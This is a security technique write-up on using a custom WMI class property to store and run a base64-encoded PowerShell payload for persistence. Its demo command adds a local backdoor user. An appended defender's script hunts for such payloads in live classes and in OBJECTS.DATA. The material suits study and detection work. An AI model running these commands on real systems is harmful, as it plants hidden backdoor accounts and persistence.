WMI as a Data Storage
Exploring WMI as a data storage for persistence by leveraging WMI classes and their properties.

Execution

Creating a new WMI class with a property EvilProperty that will later store the payload to be executed:
```powershell
$evilClass = New-Object management.managementclass('root\cimv2',$null,$null)
$evilClass.Name = "Evil"
$evilClass.Properties.Add('EvilProperty','Tis notin good sir')
$evilClass.Put()

Path          : \\.\root\cimv2:Evil
RelativePath  : Evil
Server        : .
NamespacePath : root\cimv2
ClassName     : Evil
IsClass       : True
IsInstance    : False
IsSingleton   : False
```
We can see the Evil class properties:
```powershell
([wmiclass] 'Evil').Properties

Name       : EvilProperty
Value      : Tis notin good sir
Type       : String
IsLocal    : True
IsArray    : False
Origin     : Evil
Qualifiers : {CIMTYPE}
```
Checking WMI Explorer shows the new Evil class has been created under the root\cimv2 namespace - note that the EvilProperty can also be observed:

Storing Payload

To store the payload inside EvilProperty, let's create a base64-encoded PowerShell command that adds a backdoor user with credentials backdoor:backdoor:
```powershell
$command = "cmd '/c net user add backdoor backdoor /add'"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)

# $encodedCommand = YwBtAGQAIAAvAGMAIAAnAG4AZQB0ACAAdQBzAGUAcgAgAGIAYQBjAGsAZABvAG8AcgAgAGIAYQBjAGsAZABvAG8AcgAgAC8AYQBkAGQAJwA=
```
Updating the EvilProperty attribute to store $encodedCommand:

```powershell
$evilClass.Properties.Add('EvilProperty', $encodedCommand)
```
Below is the same as above, just in a screenshot:

Real Execution

```powershell
powershell.exe -enc $evilClass.Properties['EvilProperty'].Value
```
Executing the payload stored in the WMI class property - note that the backdoor user has been successfully added:
If we commit $evilClass with its .Put() method, our payload is stored permanently in the WMI class. Note how the new "Evil" class' Properties member shows the payload we have committed:

Observations

Using the WMI Explorer, we can inspect the class' definition, which is stored in %SystemRoot%\System32\wbem\Repository\OBJECTS.DATA
The file contains all the classes and other relevant information about those classes. In our case, we can see the EvilProperty with our malicious payload inside:
When inspecting OBJECTS.DATA with a hex editor, it is possible (although not very practical nor user friendly) to find the same data - note that the screenshot refers to the state of the Evil class at the very beginning of its creation, as this is when I took the screenshot:
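The following is an added example and not code from the original page or its author: a defender's counterpart to the technique described on this page. It hunts for payloads parked in class properties from the two angles the page covers, live, by enumerating the classes in root\cimv2 whose string properties carry a base64-looking default value (which is what EvilProperty holds once the class is committed with Put()), and offline, by carving base64 runs out of a copy of OBJECTS.DATA, the repository file inspected with a hex editor above. The function names, the minimum-length thresholds and the case file path are assumptions of the example.

```powershell
# Added example: a defender's hunt for payloads parked in WMI class properties.
# Not code from the original page. Names, thresholds and the case path are assumptions.

function ConvertFrom-UnicodeBase64 {
    # Returns the decoded text if $Value is base64 of printable UTF-16LE text
    # (the form powershell.exe -enc consumes); otherwise $null.
    param([Parameter(Mandatory)][string]$Value)
    try { $bytes = [Convert]::FromBase64String($Value) } catch { return $null }
    if ($bytes.Length -eq 0 -or ($bytes.Length % 2) -ne 0) { return $null }
    $text = [System.Text.Encoding]::Unicode.GetString($bytes)
    if ($text -match '^[\x20-\x7E\t\r\n]+$') { return $text }
    return $null
}

function Find-Base64ClassProperties {
    # Live check: classes in $Namespace with a string property whose *default value*
    # looks like base64. Shipped Win32_/CIM_/MSFT_ classes almost never carry one.
    param([string]$Namespace = 'root\cimv2', [int]$MinLength = 16)
    $pattern = '^[A-Za-z0-9+/]{' + $MinLength + ',}={0,2}$'
    foreach ($class in Get-CimClass -Namespace $Namespace) {
        foreach ($prop in $class.CimClassProperties) {
            if ($prop.CimType -ne 'String') { continue }
            $value = [string]$prop.Value
            if ([string]::IsNullOrEmpty($value) -or $value -notmatch $pattern) { continue }
            [pscustomobject]@{
                Namespace = $Namespace
                Class     = $class.CimClassName
                Property  = $prop.Name
                Raw       = $value
                Decoded   = ConvertFrom-UnicodeBase64 -Value $value
            }
        }
    }
}

function Find-Base64RunsInRepository {
    # Offline check: carve base64 runs from a COPY of OBJECTS.DATA. The live file is
    # held open by the winmgmt service, so use a shadow copy or a forensic image.
    param([Parameter(Mandatory)][string]$Path, [int]$MinLength = 40)
    $bytes = [System.IO.File]::ReadAllBytes($Path)
    # Latin-1 maps each byte to exactly one char, so a match index is a file offset
    $text = [System.Text.Encoding]::GetEncoding('iso-8859-1').GetString($bytes)
    $patterns = [ordered]@{
        # base64 stored as single-byte characters
        'narrow'  = '[A-Za-z0-9+/]{' + $MinLength + ',}={0,2}'
        # the same text stored as UTF-16LE (every character followed by a NUL byte)
        'utf16le' = '(?:[A-Za-z0-9+/]\x00){' + $MinLength + ',}(?:=\x00){0,2}'
    }
    foreach ($name in $patterns.Keys) {
        foreach ($m in [regex]::Matches($text, $patterns[$name])) {
            $raw = $m.Value -replace '\x00', ''
            [pscustomobject]@{
                File     = $Path
                Offset   = '0x{0:X}' -f $m.Index
                Encoding = $name
                Raw      = $raw
                Decoded  = ConvertFrom-UnicodeBase64 -Value $raw
            }
        }
    }
}

# Live hunt on this host; with the Evil class committed via Put(), this reports
# Evil / EvilProperty together with the decoded command.
Find-Base64ClassProperties -Namespace 'root\cimv2' | Format-List

# Offline carve of a collected copy (placeholder path); only hits that decode are shown.
$repositoryCopy = 'C:\Cases\host01\OBJECTS.DATA'
if (Test-Path $repositoryCopy) {
    Find-Base64RunsInRepository -Path $repositoryCopy |
        Where-Object { $_.Decoded } |
        Format-Table Offset, Encoding, Decoded -AutoSize
}
```

Enumerating a whole namespace with Get-CimClass takes a while, but a class created this way sits among the shipped ones and is only found by looking. Sysmon's WMI events (IDs 19, 20 and 21) record event filters, consumers and bindings, not plain class creation, so a scan like this, or the carve over OBJECTS.DATA, is what actually surfaces this variant. Once a finding is confirmed, the class is removed with ([wmiclass]'root\cimv2:Evil').Delete(), and a known class name can be searched in the Latin-1 text of the repository copy the same way the hex editor step above does.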